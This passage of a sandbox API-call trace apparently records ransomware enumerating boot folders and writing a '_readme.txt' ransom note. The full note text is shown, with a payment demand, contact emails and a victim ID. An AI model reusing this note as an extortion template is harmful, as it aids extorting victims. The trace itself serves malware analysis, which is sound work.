hHeap=0x4970000) returned 1 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.020] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.020] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.022] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.022] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.023] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.024] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0128.024] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.024] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.024] PathFindFileNameW (pszPath="") returned="" [0128.024] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.024] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0128.024] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0128.025] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.025] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.027] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3892760, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3892760, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.027] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0128.027] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3892760, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3892760, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3892760, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0128.027] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3892760, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3892760, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3892760, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0128.027] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0128.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0128.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0128.027] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.028] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.028] HeapFree (in: hHeap=0x4970000, 